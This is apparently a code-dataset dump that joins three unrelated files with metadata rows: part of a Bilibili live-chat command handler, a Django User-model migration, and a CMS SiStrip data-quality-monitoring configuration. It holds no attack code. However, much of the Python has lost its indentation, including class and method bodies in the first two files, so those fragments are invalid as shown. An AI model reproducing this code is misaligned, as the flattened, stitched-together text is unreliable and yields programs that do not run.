        'SUPER_CHAT_MESSAGE_DELETE': __super_chat_message_delete_callback,
}
# 忽略其他常见cmd
for cmd in IGNORED_CMDS:
_CMD_CALLBACK_DICT[cmd] = None
del cmd
async def handle(self, client: client_.BLiveClient, command: dict):
cmd = command.get('cmd', '')
        pos = cmd.find(':')  # 2019-05-29: a Bilibili danmaku upgrade appended an extra parameter after a colon
if pos != -1:
cmd = cmd[:pos]
if cmd not in self._CMD_CALLBACK_DICT:
            # Log an unknown cmd only the first time it is seen
            if cmd not in logged_unknown_cmds:
                logger.warning('room=%d unknown cmd=%s, command=%s', client.room_id, cmd, command)
logged_unknown_cmds.add(cmd)
return
callback = self._CMD_CALLBACK_DICT[cmd]
if callback is not None:
await callback(self, client, command)
async def _on_heartbeat(self, client: client_.BLiveClient, message: models.HeartbeatMessage):
"""
        Heartbeat received (carries the room's popularity value).
"""
async def _on_danmaku(self, client: client_.BLiveClient, message: models.DanmakuMessage):
"""
        Danmaku (chat message) received.
"""
async def _on_gift(self, client: client_.BLiveClient, message: models.GiftMessage):
"""
        Gift received.
"""
async def _on_buy_guard(self, client: client_.BLiveClient, message: models.GuardBuyMessage):
"""
        Guard (membership) purchase received.
"""
async def _on_super_chat(self, client: client_.BLiveClient, message: models.SuperChatMessage):
"""
        Super chat received.
"""
async def _on_super_chat_delete(self, client: client_.BLiveClient, message: models.SuperChatDeleteMessage):
"""
        Super chat deletion received.
"""
| 29.326923
| 111
| 0.646776
|
4a18b68d8bfad338022349ee05a7246a374a4a81
| 4,772
|
py
|
Python
|
drnalpha/users/migrations/0001_initial.py
|
UKGovernmentBEIS/BRE_DigitalRegulationNavigator_Alpha
|
bfa6d08212bc18034b20b9c922a554a6e1ddd0f1
|
[
"MIT"
] | null | null | null |
drnalpha/users/migrations/0001_initial.py
|
UKGovernmentBEIS/BRE_DigitalRegulationNavigator_Alpha
|
bfa6d08212bc18034b20b9c922a554a6e1ddd0f1
|
[
"MIT"
] | null | null | null |
drnalpha/users/migrations/0001_initial.py
|
UKGovernmentBEIS/BRE_DigitalRegulationNavigator_Alpha
|
bfa6d08212bc18034b20b9c922a554a6e1ddd0f1
|
[
"MIT"
] | 1
|
2021-04-21T09:41:43.000Z
|
2021-04-21T09:41:43.000Z
|
# Generated by Django 2.0.9 on 2018-11-06 15:43
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [("auth", "0009_alter_user_last_name_max_length")]
operations = [
migrations.CreateModel(
name="User",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("password", models.CharField(max_length=128, verbose_name="password")),
(
"last_login",
models.DateTimeField(
blank=True, null=True, verbose_name="last login"
),
),
(
"is_superuser",
models.BooleanField(
default=False,
help_text="Designates that this user has all permissions without explicitly assigning them.",
verbose_name="superuser status",
),
),
(
"username",
models.CharField(
error_messages={
"unique": "A user with that username already exists."
},
help_text="Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.",
max_length=150,
unique=True,
validators=[
django.contrib.auth.validators.UnicodeUsernameValidator()
],
verbose_name="username",
),
),
(
"first_name",
models.CharField(
blank=True, max_length=30, verbose_name="first name"
),
),
(
"last_name",
models.CharField(
blank=True, max_length=150, verbose_name="last name"
),
),
(
"email",
models.EmailField(
blank=True, max_length=254, verbose_name="email address"
),
),
(
"is_staff",
models.BooleanField(
default=False,
help_text="Designates whether the user can log into this admin site.",
verbose_name="staff status",
),
),
(
"is_active",
models.BooleanField(
default=True,
help_text="Designates whether this user should be treated as active. Unselect this instead of deleting accounts.",
verbose_name="active",
),
),
(
"date_joined",
models.DateTimeField(
default=django.utils.timezone.now, verbose_name="date joined"
),
),
(
"groups",
models.ManyToManyField(
blank=True,
help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
related_name="user_set",
related_query_name="user",
to="auth.Group",
verbose_name="groups",
),
),
(
"user_permissions",
models.ManyToManyField(
blank=True,
help_text="Specific permissions for this user.",
related_name="user_set",
related_query_name="user",
to="auth.Permission",
verbose_name="user permissions",
),
),
],
options={
"verbose_name": "user",
"verbose_name_plural": "users",
"abstract": False,
},
managers=[("objects", django.contrib.auth.models.UserManager())],
)
]
| 36.992248
| 138
| 0.398575
|
4a18b6d4d6d2d9124e1cf649cccc604928308adb
| 32,686
|
py
|
Python
|
DQM/Integration/python/clients/sistrip_dqm_sourceclient-live_cfg.py
|
akssikdar/cmssw
|
060bed0f27c94e9803b26f2f595fab5db394a6d8
|
[
"Apache-2.0"
] | 2
|
2020-05-09T16:03:43.000Z
|
2020-05-09T16:03:50.000Z
|
DQM/Integration/python/clients/sistrip_dqm_sourceclient-live_cfg.py
|
akssikdar/cmssw
|
060bed0f27c94e9803b26f2f595fab5db394a6d8
|
[
"Apache-2.0"
] | null | null | null |
DQM/Integration/python/clients/sistrip_dqm_sourceclient-live_cfg.py
|
akssikdar/cmssw
|
060bed0f27c94e9803b26f2f595fab5db394a6d8
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import FWCore.ParameterSet.Config as cms
import sys
from Configuration.Eras.Era_Run2_2018_pp_on_AA_cff import Run2_2018_pp_on_AA
process = cms.Process("SiStrpDQMLive", Run2_2018_pp_on_AA)
process.MessageLogger = cms.Service("MessageLogger",
debugModules = cms.untracked.vstring('siStripDigis',
'siStripClusters',
'siStripZeroSuppression',
'SiStripClusterizer'),
cout = cms.untracked.PSet(threshold = cms.untracked.string('ERROR')),
destinations = cms.untracked.vstring('cout')
)
live=True
unitTest=False
if 'unitTest=True' in sys.argv:
live=False
unitTest=True
# uncomment for running on lxplus
#live=False
offlineTesting=not live
#print "live: "+str(live)+" ==> offlineTesting: "+str(offlineTesting)
#----------------------------
# Event Source
#-----------------------------
# for live online DQM in P5
if (unitTest):
process.load("DQM.Integration.config.unittestinputsource_cfi")
elif (live):
process.load("DQM.Integration.config.inputsource_cfi")
# for testing in lxplus
elif(offlineTesting):
process.load("DQM.Integration.config.fileinputsource_cfi")
#----------------------------
# DQM Live Environment
#-----------------------------
#from DQM.Integration.config.environment_cfi import HEAVYION
#process.runType.setRunType('cosmic_run')
#process.runType.setRunType('pp_run')
process.load("DQM.Integration.config.environment_cfi")
process.DQM.filter = '^(SiStrip|Tracking)(/[^/]+){0,5}$'
process.dqmEnv.subSystemFolder = "SiStrip"
process.dqmSaver.tag = "SiStrip"
process.dqmSaver.backupLumiCount = 30
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
process.dqmEnvTr = DQMEDAnalyzer('DQMEventInfo',
subSystemFolder = cms.untracked.string('Tracking'),
eventRateWindow = cms.untracked.double(0.5),
eventInfoFolder = cms.untracked.string('EventInfo')
)
#-----------------------------
# Magnetic Field
#-----------------------------
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
#-------------------------------------------------
# GEOMETRY
#-------------------------------------------------
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
#--------------------------
# Calibration
#--------------------------
# Condition for P5 cluster
if (live):
process.load("DQM.Integration.config.FrontierCondition_GT_cfi")
# Condition for lxplus: change and possibly customise the GT
elif(offlineTesting):
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.GlobalTag import GlobalTag as gtCustomise
#you may need to set manually the GT in the line below
process.GlobalTag = gtCustomise(process.GlobalTag, 'auto:run2_data', '')
#--------------------------------------------
## Patch to avoid using Run Info information in reconstruction
#
process.siStripQualityESProducer.ListOfRecordToMerge = cms.VPSet(
cms.PSet( record = cms.string("SiStripDetVOffRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripDetCablingRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripBadChannelRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripBadFiberRcd"), tag = cms.string("") ),
cms.PSet( record = cms.string("SiStripBadModuleRcd"), tag = cms.string("") )
)
#-------------------------------------------
#-----------------------
# Reconstruction Modules
#-----------------------
## Collision Reconstruction
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
## Cosmic Track Reconstruction
if (process.runType.getRunType() == process.runType.cosmic_run or process.runType.getRunType() == process.runType.cosmic_run_stage1):
process.load("RecoTracker.Configuration.RecoTrackerP5_cff")
process.load("Configuration.StandardSequences.ReconstructionCosmics_cff")
else:
process.load("Configuration.StandardSequences.Reconstruction_cff")
import RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi
process.offlineBeamSpot = RecoVertex.BeamSpotProducer.BeamSpotOnline_cfi.onlineBeamSpotProducer.clone()
#
# Strip FED check
#
process.load("DQM.SiStripMonitorHardware.siStripFEDCheck_cfi")
process.siStripFEDCheck.RawDataTag = cms.InputTag("rawDataCollector")
process.siStripFEDCheck.DirName = cms.untracked.string('SiStrip/FEDIntegrity_SM/')
process.siStripFEDCheck.doPLOTfedsPresent = cms.bool(False) # already produced by fedtest
process.siStripFEDCheck.doPLOTfedFatalErrors = cms.bool(False) # already produced by fedtest
process.siStripFEDCheck.doPLOTfedNonFatalErrors = cms.bool(False) # already produced by fedtest
process.siStripFEDCheck.doPLOTnFEDinVsLS = cms.bool(True)
process.siStripFEDCheck.doPLOTnFEDinWdataVsLS = cms.bool(True)
#------------------------------
# Strip and Tracking DQM Source
#------------------------------
process.load("DQM.SiStripMonitorClient.SiStripSourceConfigP5_cff")
process.load("DQM.TrackingMonitorSource.TrackingSourceConfigP5_cff")
process.TrackMon_gentk.doLumiAnalysis = False
process.TrackMon_ckf.doLumiAnalysis = False
process.TrackMon_hi.doLumiAnalysis = False
process.TrackMon_ckf.AlgoName = 'CKFTk'
#--------------------------
# Quality Test
#--------------------------
from DQMServices.Core.DQMQualityTester import DQMQualityTester
process.stripQTester = DQMQualityTester(
qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config.xml'),
prescaleFactor = cms.untracked.int32(3),
getQualityTestsFromFile = cms.untracked.bool(True),
qtestOnEndLumi = cms.untracked.bool(True),
qtestOnEndRun = cms.untracked.bool(True)
)
process.trackingQTester = DQMQualityTester(
qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config.xml'),
prescaleFactor = cms.untracked.int32(3),
getQualityTestsFromFile = cms.untracked.bool(True),
qtestOnEndLumi = cms.untracked.bool(True),
qtestOnEndRun = cms.untracked.bool(True)
)
#--------------------------
# Service
#--------------------------
process.AdaptorConfig = cms.Service("AdaptorConfig")
# Simple filter for event
process.eventFilter = cms.EDFilter("SimpleEventFilter",
# EventsToSkip = cms.untracked.int32(3)
EventsToSkip = cms.untracked.int32(100)
)
#--------------------------
# Producers
#--------------------------
# Event History Producer
process.load("DPGAnalysis.SiStripTools.eventwithhistoryproducerfroml1abc_cfi")
# APV Phase Producer
process.load("DPGAnalysis.SiStripTools.apvcyclephaseproducerfroml1tsDB_cfi")
#--------------------------
# Filters
#--------------------------
# HLT Filter
# 0=random, 1=physics, 2=calibration, 3=technical
process.hltTriggerTypeFilter = cms.EDFilter("HLTTriggerTypeFilter",
SelectedTriggerType = cms.int32(1)
)
# L1 Trigger Bit Selection (bit 40 and 41 for BSC trigger)
process.load('L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff')
process.load('HLTrigger/HLTfilters/hltLevel1GTSeed_cfi')
process.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)
process.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('NOT (36 OR 37 OR 38 OR 39)')
# HLT trigger selection (HLT_ZeroBias)
# modified for 0 Tesla HLT menu (no ZeroBias_*)
process.load('HLTrigger.HLTfilters.hltHighLevel_cfi')
if (process.runType.getRunType() == process.runType.hi_run):
#--------------------------
# HI Runs HLT path
#--------------------------
process.hltHighLevel.HLTPaths = cms.vstring( 'HLT_ZeroBias_*' , 'HLT_HIZeroBias*' , 'HLT_ZeroBias1_*' , 'HLT_PAZeroBias_*' , 'HLT_PAZeroBias1_*', 'HLT_PAL1MinimumBiasHF_OR_SinglePixelTrack_*' , 'HLT_HICentralityVeto*','HLT_HIMinimumBias*', 'HLT_HIPhysics*')
else:
process.hltHighLevel.HLTPaths = cms.vstring( 'HLT_ZeroBias_*' , 'HLT_ZeroBias1_*' , 'HLT_PAZeroBias_*' , 'HLT_PAZeroBias1_*', 'HLT_PAL1MinimumBiasHF_OR_SinglePixelTrack_*')
process.hltHighLevel.andOr = cms.bool(True)
process.hltHighLevel.throw = cms.bool(False)
#--------------------------
# Scheduling
#--------------------------
process.SiStripSources_LocalReco = cms.Sequence(process.siStripFEDMonitor*process.SiStripMonitorDigi*process.SiStripMonitorClusterReal)
process.DQMCommon = cms.Sequence(process.stripQTester*process.trackingQTester*process.dqmEnv*process.dqmEnvTr*process.dqmSaver)
if (process.runType.getRunType() == process.runType.hi_run):
process.RecoForDQM_LocalReco = cms.Sequence(process.siPixelDigis*process.siStripDigis*process.trackerlocalreco)
else :
process.RecoForDQM_LocalReco = cms.Sequence(process.siPixelDigis*process.siStripDigis*process.gtDigis*process.trackerlocalreco)
#------------------------------------------------------
# Switch for channel errors per FED ID trend plots.
#------------------------------------------------------
process.siStripFEDMonitor.fedErrorsVsIdVsLumiHistogramConfig.globalswitchon = cms.untracked.bool(True)
#--------------------------
# Global Plot Switches
#--------------------------
process.SiStripMonitorDigi.TotalNumberOfDigisFailure.subdetswitchon = cms.bool(False)
### COSMIC RUN SETTING
if (process.runType.getRunType() == process.runType.cosmic_run or process.runType.getRunType() == process.runType.cosmic_run_stage1):
# event selection for cosmic data
if ((process.runType.getRunType() == process.runType.cosmic_run) and live): process.source.SelectEvents = cms.untracked.vstring('HLT*SingleMu*','HLT_L1*')
# Reference run for cosmic
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_cosmic.root'
# Source config for cosmic data
process.SiStripSources_TrkReco_cosmic = cms.Sequence(process.SiStripMonitorTrack_ckf*process.TrackMon_ckf)
# Client config for cosmic data
### STRIP
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_Cosmic_cff")
process.SiStripAnalyserCosmic.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.SiStripAnalyserCosmic.TkMapCreationFrequency = -1
process.SiStripAnalyserCosmic.ShiftReportFrequency = -1
process.SiStripAnalyserCosmic.StaticUpdateFrequency = 5
process.SiStripAnalyserCosmic.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyserCosmic)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_Cosmic_cff")
process.TrackingAnalyserCosmic.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.TrackingAnalyserCosmic.ShiftReportFrequency = -1
process.TrackingAnalyserCosmic.StaticUpdateFrequency = 5
process.TrackingClient = cms.Sequence( process.TrackingAnalyserCosmic )
# Reco for cosmic data
process.load('RecoTracker.SpecialSeedGenerators.SimpleCosmicBONSeeder_cfi')
process.simpleCosmicBONSeeds.ClusterCheckPSet.MaxNumberOfCosmicClusters = 450
process.combinatorialcosmicseedfinderP5.MaxNumberOfCosmicClusters = 450
process.RecoForDQM_TrkReco_cosmic = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEvent*process.ctftracksP5)
process.stripQTester.qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config_cosmic.xml')
process.stripQTester.prescaleFactor = cms.untracked.int32(2)
process.stripQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.stripQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.stripQTester.qtestOnEndRun = cms.untracked.bool(True)
process.trackingQTester.qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config_cosmic.xml')
process.trackingQTester.prescaleFactor = cms.untracked.int32(1)
process.trackingQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndRun = cms.untracked.bool(True)
process.p = cms.Path(process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.RecoForDQM_LocalReco*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
process.RecoForDQM_TrkReco_cosmic*
process.SiStripSources_TrkReco_cosmic*
process.TrackingClient
)
#else :
### pp COLLISION SETTING
if (process.runType.getRunType() == process.runType.pp_run or process.runType.getRunType() == process.runType.pp_run_stage1):
#event selection for pp collisions
if ((process.runType.getRunType() == process.runType.pp_run) and live):
process.source.SelectEvents = cms.untracked.vstring(
'HLT_L1*',
'HLT_Jet*',
'HLT_Physics*',
'HLT_ZeroBias*',
'HLT_PAL1*',
'HLT_PAZeroBias*',
'HLT_PAAK*'
)
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_pp.root'
# Source and Client config for pp collisions
process.SiStripMonitorDigi.UseDCSFiltering = cms.bool(False)
process.SiStripMonitorClusterReal.UseDCSFiltering = cms.bool(False)
process.MonitorTrackResiduals_gentk.Tracks = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.trajectoryInput = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.TrackProducer = cms.string('initialStepTracksPreSplitting')
process.TrackMon_gentk.TrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.TrackMon_gentk.allTrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.SiStripMonitorTrack_gentk.TrackProducer = 'initialStepTracksPreSplitting'
process.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)
### STRIP
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_cff")
process.SiStripAnalyser.UseGoodTracks = cms.untracked.bool(True)
process.SiStripAnalyser.TkMapCreationFrequency = -1
process.SiStripAnalyser.ShiftReportFrequency = -1
process.SiStripAnalyser.StaticUpdateFrequency = 5
process.SiStripAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.SiStripAnalyser.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyser)
process.SiStripMonitorDigi.TotalNumberOfDigisFailure.integrateNLumisections = cms.int32(25)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_cff")
process.TrackingAnalyser.ShiftReportFrequency = -1
process.TrackingAnalyser.StaticUpdateFrequency = 5
process.TrackingAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
if offlineTesting :
process.TrackingAnalyser.verbose = cms.untracked.bool(True)
process.TrackingClient = cms.Sequence( process.TrackingAnalyser )
process.trackingQTester.qtList = cms.untracked.FileInPath('DQM/TrackingMonitorClient/data/tracking_qualitytest_config.xml')
process.trackingQTester.prescaleFactor = cms.untracked.int32(1)
process.trackingQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndLumi = cms.untracked.bool(True)
process.trackingQTester.qtestOnEndRun = cms.untracked.bool(True)
# Reco for pp collisions
process.load('RecoTracker.IterativeTracking.InitialStepPreSplitting_cff')
    # The Task-based removals below supersede the old Sequence-based ones.
process.InitialStepPreSplittingTask.remove(process.initialStepTrackRefsForJetsPreSplitting)
process.InitialStepPreSplittingTask.remove(process.caloTowerForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.ak4CaloJetsForTrkPreSplitting)
process.InitialStepPreSplittingTask.remove(process.jetsForCoreTrackingPreSplitting)
process.InitialStepPreSplittingTask.remove(process.siPixelClusters)
process.InitialStepPreSplittingTask.remove(process.siPixelRecHits)
process.InitialStepPreSplittingTask.remove(process.MeasurementTrackerEvent)
# Redefinition of siPixelClusters: has to be after RecoTracker.IterativeTracking.InitialStepPreSplitting_cff
process.load("RecoLocalTracker.SiPixelClusterizer.SiPixelClusterizer_cfi")
from RecoTracker.TkSeedingLayers.PixelLayerTriplets_cfi import *
process.PixelLayerTriplets.BPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
process.PixelLayerTriplets.FPix.HitProducer = cms.string('siPixelRecHitsPreSplitting')
from RecoPixelVertexing.PixelTrackFitting.PixelTracks_cff import *
process.pixelTracksHitTriplets.SeedComparitorPSet.clusterShapeCacheSrc = 'siPixelClusterShapeCachePreSplitting'
process.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEventPreSplitting*process.siPixelClusterShapeCachePreSplitting*process.recopixelvertexing*process.InitialStepPreSplitting)
process.p = cms.Path(
process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.RecoForDQM_LocalReco*
process.siPixelClusters*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
##### TRIGGER SELECTION #####
process.hltHighLevel*
process.RecoForDQM_TrkReco*
process.SiStripSources_TrkReco*
process.TrackingClient
)
#--------------------------------------------------
# For high PU run - no tracking in cmssw42x
#--------------------------------------------------
if (process.runType.getRunType() == process.runType.hpu_run):
# Simple filter for event
# 2012.07.09 highPU fill should have /cdaq/special/HighPUFill/July2012/HLT/V6 as trigger table
# where HLT_ZeroBias in the DQM stream has ~50Hz
# the expected reconstruction time should be ~ several seconds
# => PRESCALE = 50
# but try firstly w/ 30, maybe it is enough
process.eventFilter.EventsToSkip = cms.untracked.int32(30)
# change the HLT trigger path selection
# it should already be ok, but the name could be changed
process.hltHighLevel.HLTPaths = cms.vstring( 'HLT_ZeroBias*' )
# process.DQMEventStreamerReader.SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('HLT_600Tower*','HLT_L1*','HLT_Jet*','HLT_HT*','HLT_MinBias_*','HLT_Physics*', 'HLT_ZeroBias*'))
#
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_pp.root'
process.SiStripMonitorDigi.UseDCSFiltering = cms.bool(False)
process.SiStripMonitorClusterReal.UseDCSFiltering = cms.bool(False)
process.MonitorTrackResiduals_gentk.Tracks = 'earlyGeneralTracks'
process.MonitorTrackResiduals_gentk.trajectoryInput = 'earlyGeneralTracks'
process.MonitorTrackResiduals_gentk.TrackProducer = cms.string('earlyGeneralTracks')
process.TrackMon_gentk.TrackProducer = cms.InputTag("earlyGeneralTracks")
process.TrackMon_gentk.allTrackProducer = cms.InputTag("earlyGeneralTracks")
process.SiStripMonitorTrack_gentk.TrackProducer = 'earlyGeneralTracks'
process.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_cff")
process.SiStripAnalyser.UseGoodTracks = cms.untracked.bool(True)
process.SiStripAnalyser.TkMapCreationFrequency = -1
process.SiStripAnalyser.ShiftReportFrequency = -1
process.SiStripAnalyser.StaticUpdateFrequency = 5
process.SiStripAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.SiStripAnalyser.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyser)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_cff")
process.TrackingAnalyser.ShiftReportFrequency = -1
process.TrackingAnalyser.StaticUpdateFrequency = 5
process.TrackingAnalyser.RawDataTag = cms.untracked.InputTag("rawDataCollector")
process.TrackingClient = cms.Sequence( process.TrackingAnalyser )
# Reco for pp collisions
process.load('RecoTracker.Configuration.RecoTracker_cff')
#process.newCombinedSeeds.seedCollections = cms.VInputTag(
# cms.InputTag('initialStepSeeds'),
# )
process.load('RecoTracker.FinalTrackSelectors.MergeTrackCollections_cff')
import RecoTracker.FinalTrackSelectors.earlyGeneralTracks_cfi
process.load('RecoTracker.FinalTrackSelectors.earlyGeneralTracks_cfi')
process.earlyGeneralTracks.TrackProducers = (
cms.InputTag('initialStepTracks'),
)
process.earlyGeneralTracks.hasSelector=cms.vint32(1)
process.earlyGeneralTracks.selectedTrackQuals = cms.VInputTag(
# cms.InputTag("initialStepSelector","initialStep"),
cms.InputTag("initialStep"),
)
process.earlyGeneralTracks.setsToMerge = cms.VPSet( cms.PSet( tLists=cms.vint32(0), pQual=cms.bool(True) ) )
process.load("RecoTracker.IterativeTracking.iterativeTk_cff")
process.iterTracking_FirstStep =cms.Sequence(
process.InitialStep
*process.earlyGeneralTracks
)
process.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.MeasurementTrackerEvent*process.siPixelClusterShapeCache*process.recopixelvertexing*process.iterTracking_FirstStep)
process.p = cms.Path(process.scalersRawToDigi*
process.APVPhases*
process.consecutiveHEs*
process.hltTriggerTypeFilter*
process.siStripFEDCheck *
process.RecoForDQM_LocalReco*
process.DQMCommon*
process.SiStripClients*
process.SiStripSources_LocalReco*
process.hltHighLevel*
process.eventFilter*
process.RecoForDQM_TrkReco*
process.SiStripSources_TrkReco*
process.TrackingClient
)
process.castorDigis.InputLabel = cms.InputTag("rawDataCollector")
process.csctfDigis.producer = cms.InputTag("rawDataCollector")
process.dttfDigis.DTTF_FED_Source = cms.InputTag("rawDataCollector")
process.ecalDigis.InputLabel = cms.InputTag("rawDataCollector")
process.ecalPreshowerDigis.sourceTag = cms.InputTag("rawDataCollector")
process.gctDigis.inputLabel = cms.InputTag("rawDataCollector")
process.gtDigis.DaqGtInputTag = cms.InputTag("rawDataCollector")
process.hcalDigis.InputLabel = cms.InputTag("rawDataCollector")
process.muonCSCDigis.InputObjects = cms.InputTag("rawDataCollector")
process.muonDTDigis.inputLabel = cms.InputTag("rawDataCollector")
process.muonRPCDigis.InputLabel = cms.InputTag("rawDataCollector")
process.scalersRawToDigi.scalersInputTag = cms.InputTag("rawDataCollector")
process.siPixelDigis.InputLabel = cms.InputTag("rawDataCollector")
process.siStripDigis.ProductLabel = cms.InputTag("rawDataCollector")
process.siStripFEDMonitor.RawDataTag = cms.untracked.InputTag("rawDataCollector")
#--------------------------------------------------
# Heavy Ion Specific Fed Raw Data Collection Label
#--------------------------------------------------
print("Running with run type = ", process.runType.getRunType())
### HEAVY ION SETTING
if (process.runType.getRunType() == process.runType.hi_run):
process.castorDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.csctfDigis.producer = cms.InputTag("rawDataRepacker")
process.dttfDigis.DTTF_FED_Source = cms.InputTag("rawDataRepacker")
process.ecalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.ecalPreshowerDigis.sourceTag = cms.InputTag("rawDataRepacker")
process.gctDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.hcalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.muonCSCDigis.InputObjects = cms.InputTag("rawDataRepacker")
process.muonDTDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.muonRPCDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.scalersRawToDigi.scalersInputTag = cms.InputTag("rawDataRepacker")
process.siPixelDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.siStripDigis.ProductLabel = cms.InputTag("rawDataRepacker")
process.siStripFEDMonitor.RawDataTag = cms.untracked.InputTag("rawDataRepacker")
if ((process.runType.getRunType() == process.runType.hi_run) and live):
process.source.SelectEvents = cms.untracked.vstring(
'HLT_HICentralityVeto*',
# 'HLT_HIMinimumBias*',
# 'HLT_HIZeroBias*'
'HLT_HIPhysics*'
)
process.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference_pp.root'
process.SiStripMonitorDigi.UseDCSFiltering = cms.bool(False)
process.SiStripMonitorClusterReal.UseDCSFiltering = cms.bool(False)
process.MonitorTrackResiduals_gentk.Tracks = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.trajectoryInput = 'initialStepTracksPreSplitting'
process.MonitorTrackResiduals_gentk.TrackProducer = cms.string('initialStepTracksPreSplitting')
process.TrackMon_gentk.TrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.TrackMon_gentk.allTrackProducer = cms.InputTag('initialStepTracksPreSplitting')
process.SiStripMonitorTrack_gentk.TrackProducer = 'initialStepTracksPreSplitting'
process.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)
### STRIP
process.load("DQM.SiStripMonitorClient.SiStripClientConfigP5_cff")
process.SiStripAnalyser.UseGoodTracks = cms.untracked.bool(True)
process.SiStripAnalyser.TkMapCreationFrequency = -1
process.SiStripAnalyser.ShiftReportFrequency = -1
process.SiStripAnalyser.StaticUpdateFrequency = 5
process.SiStripAnalyser.RawDataTag = cms.untracked.InputTag("rawDataRepacker")
process.SiStripAnalyser.MonitorSiStripBackPlaneCorrection = cms.bool(False)
process.SiStripClients = cms.Sequence(process.SiStripAnalyser)
process.SiStripMonitorDigi.TotalNumberOfDigisFailure.integrateNLumisections = cms.int32(25)
### TRACKING
process.load("DQM.TrackingMonitorClient.TrackingClientConfigP5_cff")
process.TrackingAnalyser.ShiftReportFrequency = -1
process.TrackingAnalyser.StaticUpdateFrequency = 5
process.TrackingAnalyser.RawDataTag = cms.untracked.InputTag("rawDataRepacker")
if offlineTesting :
process.TrackingAnalyser.verbose = cms.untracked.bool(True)
process.TrackingClient = cms.Sequence( process.TrackingAnalyser )
process.stripQTester.qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config_heavyion.xml')
process.stripQTester.prescaleFactor = cms.untracked.int32(2)
process.stripQTester.getQualityTestsFromFile = cms.untracked.bool(True)
process.stripQTester.qtestOnEndLumi = cms.untracked.bool(True)
